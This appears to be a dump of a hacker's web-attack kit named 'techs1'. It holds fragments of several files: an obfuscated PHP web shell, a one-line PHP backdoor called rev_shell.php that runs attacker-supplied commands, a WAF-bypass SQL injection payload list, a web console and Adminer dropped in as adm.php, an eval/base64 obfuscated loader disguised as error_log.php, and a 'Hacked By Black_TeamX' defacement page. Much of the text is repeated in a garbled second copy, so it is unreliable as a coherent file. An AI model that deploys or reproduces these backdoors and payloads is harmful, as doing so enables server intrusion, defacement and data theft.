techs1

## style_eg.css
@font-face{font-family:fontico;src:url(./fontico.eot);src:url(./fontico.eot#iefix) format('embedded-opentype'),url(./fontico.svg#fontico) format('svg');font-weight:400;font-style:normal}@font-face{font-family:fontico;src:url(data:application/font-woff;base64,d09GRgABAAAAAF6AAA8AAAAAmBwAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAABHU1VCAAABWAAAADsAAABUIIslek9TLzIAAAGUAAAAQwAAAFY+IVMRY21hcAAAAdgAAALJAAAIio/1sdljdnQgAAAEpAAAABMAAAAgBvX/AmZwZ20AAAS4AAAFkAAAC3CKkZBZZ2FzcAAACkgAAAAIAAAACAAAABBnbHlmAAAKUAAATTQAAHecsCmrz2hlYWQAAFeEAAAANAAAADYVkGsdaGhlYQAAV7gAAAAgAAAAJAiIBR9obXR4AABX2AAAAOcAAAIEu+b/tmxvY2EAAFjAAAABBAAAAQRudYx6bWF4cAAAWcQAAAAgAAAAIAI9DJ5uYW1lAABZ5AAAAXkAAALBX+HVonBvc3QAAFtgAAACpAAAA+Pc1oDgcHJlcAAAXgQAAAB6AAAAhuVBK7x4nGNgZGBg4GIwYLBjYHJx8wlh4MtJLMljkGJgYYAAkDwymzEnMz2RgQPGA8qxgGkOIGaDiAIAJjsFSAB4nGNgZC5knMDAysDAVMW0h4GBoQdCMz5gMGRkAooysDIzYAUBaa4pDA4vGD4xMgf9z2KIYk5imA4UZgTJAQDlXQu6AHic7dXXcpUFGIXhd4cQGyKIqKCCAooFu4CVpiIKFsQOdsFC11goau6PO+AK1mE2zMBhfP/sdeBFkMyTyb8PdvZkvrUWsBRYoi2ahqnzjPyN0ayvjhZfX8Kti69Pj/b5vJybmWIm5

## jq.php
<html>
<?php
session_start();
error_reporting(0);
set_time_limit(0);
@set_magic_quotes_runtime(0);
@clearstatcache();
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);

## IMG1.php
<?php ${"\x47L\x4f\x42\x41\x4c\x53"}["\x67\x76ew\x69efw\x66\x65g"]="fg\x72\x70";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x65bx\x75\x63\x71\x77\x72\x6e\x79\x6e\x77"]="\x66\x6f\x77n\x65r";${"\x47L\x4f\x42A\x4c\x53"}["\x66\x63eqt\x74\x65"]="ft\x79\x70\x65";${"\x47L\x4fB\x41\x4c\x53"}["\x74wn\x7an\x69b\x6a\x6a\x64\x74"]="\x61ct_d\x69r";${"GL\x4f\x42A\x4c\x53"}["\x76\x73\x65t\x66\x72\x66\x63"]="\x68r\x65f";${"\x47L\x4f\x42\x41\x4c\x53"}["\x78\x65\x79\x66c\x71\x6e\x68\x6c"]="d\x67\x72\x70";${"\x47\x4c\x4fBA\x4c\x53"}["\x73\x68\x76\x71\x69w\x66\x78y\x77"]="\x64\x6f\x77n\x65\x72";${"G\x4cO\x42\x41\x4cS"}["\x66vmwi\x61"]="d\x74\x69me";${"GLO\x42A\x4cS"}["x\x74\x6a\x77i\x67\x75\x73\x64"]="\x64\x74\x79\x70\x65";${"\x47\x4c\x4fB\x41\x4c\x53"}["\x72jex\x70x"]="\x64\x69\x72\x78";${"\x47\x4cOBAL\x53"}["\x6fxgo\x6a\x68\x68"]="s\x63\x61\x6e\x64\x69r";${"\x47\x4c\x4f\x42\x41L\x53"}["\x79\x73tw\x6e\x6a\x6ch"]="\x72\x65\x6ca\x74\x69\x76e\x50\x61\x74\x68";${"\x47\x4c\x4f\x42A\x4c\x53"}["\x77u\x68\x71\x74\x6c\x63ei\x7a"]="\x66i\x6c\x65

## sqli-bypass-waf.txt
[~] order by [~]

/**/ORDER/**/BY/**/
/*!order*/+/*!by*/
/*!ORDER BY*/
/*!50000ORDER BY*/
/*!50000ORDER*//**//*!50000BY*/
/*!12345ORDER*/+/*!BY*/

[~] UNION select [~]

## rev_shell.php
<?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`;

/*
 *   In terminal:
 *       $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php
 *   This is how the code will be produced, \xa0\xb8\xba\xab will be
 *   treated as constant therefore no " needed. It is also not copyable
 *   string because of non-ascii characters
 *
 *   Explanation:

## list.txt
aaaa
baaa
caaa
daaa
eaaa
faaa
gaaa
haaa
iaaa
jaaa

## Xsol-cmd.php
<?php
// Web Console v0.9.7 (2016-11-05)
//
// Author: Nickolay Kovalev (http://nickola.ru)
// GitHub: https://github.com/nickola/web-console
// URL: http://web-console.org

// Disable login (don't ask for credentials, be careful)
// Example: $NO_LOGIN = true;
$NO_LOGIN = false;

## index.php

<html>
<head>
<title>Hacked By Black_TeamX</title>
<meta name="title" content=" Hacked By Black_TeamX">
<meta name="description" content="Hacked By Black_TeamX ">
<meta name="keywords" content="Hacked By Black_TeamX ">
<meta content="" name="author">
<p align="center">
<br><font face="Iceland" size="7" color="#E9E9E9">

## error_log.php
<?php // Copyright 2018 - Do not attempt to reverse engineer this file. Please contact for details, quoting the reference: style_css-2018-09-14/033246 (Generated on 2018-09-14 - https://gailey-white.com/php-obfuscator)
$OI0IO10101OI0I01=__FILE__;$O10I0I01O1OI01OIOI=1064;eval(base64_decode('LyplNld4eG5nNFh3SFY1TTQ4QzhUWVRndFNOR1VDRHpEdkpJUWhHZjVTZldXTklBcHJoeWZqYXJBdiovJE9JMEkwMU8xMElPSU9JMEk9Zm9wZW4oJE9JMElPMTAxMDFPSTBJMDEsJ3JiJyk7JE8xT0lPMTAxMElPSTAxMDE9aW50dmFsKCcwMDI2ODEnKTtmc2VlaygkT0kwSTAxTzEwSU9JT0kwSSxpbnR2YWwoJzAwMDg1MycpKTtldmFsKGJhc2U2NF9kZWNvZGUoc3RydHIoZnJlYWQoJE9JMEkwMU8xMElPSU9JMEksNDY0KSwncl9lJEVRZyZLbVdMIVR3K0ZYPyVDUzRZdixEYUA5NilaeDFpPWNvYk5QSHRwOGtHTXVWcTV5SVJmLSNVMHNCMkFKbmxkKGouaDN6N08nLCdBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6MTIzNDU2Nzg5MC4sISQlJigpLV8rPUAjPycpKSk7cmV0dXJuOw=='));return;?>LVPEF=,-@bTG!=P&DiQWD$m_C=PCTSmG!=fWa&ZySE9Y@1NG,bTc,4pNmE0m!E=M!CUu!Ec+?C0m!E=pmEUu%sc+!%ru!Ec+?%ru!$EPwySyv4MNvoQq,%vsYyXcvy0=,?xq9&ms@1xb6bSkvy08@&mc@I!NvoQq,%vsYyXcvy0=

## adm.php
<?php
/** Adminer - Compact database management
* @link https://www.adminer.org/
* @author Jakub Vrana, https://www.vrana.cz/
* @copyright 2007 Jakub Vrana
* @license https://www.apache.org/licenses/LICENSE-2.0 Apache License, Version 2.0
* @license https://www.gnu.org/licenses/gpl-2.0.html GNU General Public License, version 2 (one or other)
* @version 4.6.3
*/error_reporting(6135);$Uc=!preg_match('~^(unsafe_raw)?$~',ini_get("filter.default"));if($Uc||ini_get("filter.default_flags")){foreach(array('_GET','_POST','_COOKIE','_SERVER')as$X){$Ai=filter_input_array(constant("INPUT$X"),FILTER_UNSAFE_RAW);if($Ai)$$X=$Ai;}}if(function_exists("mb_internal_encoding"))mb_internal_encoding("8bit");function
connection(){global$g;return$g;}function
	<html>
	<?php
	session_start();
	error_reporting(0);
	set_time_limit(0);
	@set_magic_quotes_runtime(0);
	@clearstatcache();
	@ini_set('error_log',NULL);
	@ini_set('log_errors',0);
	@ini_set('max_execution_time',0);
	[~] order by [~]

	//ORDER//BY/**/
	/!order/+/!by/
	/!ORDER BY/
	/!50000ORDER BY/
	/!50000ORDER//*//!50000BY*/
	/!12345ORDER/+/!BY/

	[~] UNION select [~]
	<?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`;

	/*
	* In terminal:
	* $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php
	* This is how the code will be produced, \xa0\xb8\xba\xab will be
	* treated as constant therefore no " needed. It is also not copyable
	* string because of non-ascii characters
	*
	* Explanation:
	<?php
	// Web Console v0.9.7 (2016-11-05)
	//
	// Author: Nickolay Kovalev (http://nickola.ru)
	// GitHub: https://github.com/nickola/web-console
	// URL: http://web-console.org

	// Disable login (don't ask for credentials, be careful)
	// Example: $NO_LOGIN = true;
	$NO_LOGIN = false;

	<html>
	<head>
	<title>Hacked By Black_TeamX</title>
	<meta name="title" content=" Hacked By Black_TeamX">
	<meta name="description" content="Hacked By Black_TeamX ">
	<meta name="keywords" content="Hacked By Black_TeamX ">
	<meta content="" name="author">
	<p align="center">
	<br><font face="Iceland" size="7" color="#E9E9E9">
	<?php
	/** Adminer - Compact database management
	* @link https://www.adminer.org/
	* @author Jakub Vrana, https://www.vrana.cz/
	* @copyright 2007 Jakub Vrana
	* @license https://www.apache.org/licenses/LICENSE-2.0 Apache License, Version 2.0
	* @license https://www.gnu.org/licenses/gpl-2.0.html GNU General Public License, version 2 (one or other)
	* @version 4.6.3
	*/error_reporting(6135);$Uc=!preg_match('~^(unsafe_raw)?$~',ini_get("filter.default"));if($Uc\|\|ini_get("filter.default_flags")){foreach(array('_GET','_POST','_COOKIE','_SERVER')as$X){$Ai=filter_input_array(constant("INPUT$X"),FILTER_UNSAFE_RAW);if($Ai)$$X=$Ai;}}if(function_exists("mb_internal_encoding"))mb_internal_encoding("8bit");function
	connection(){global$g;return$g;}function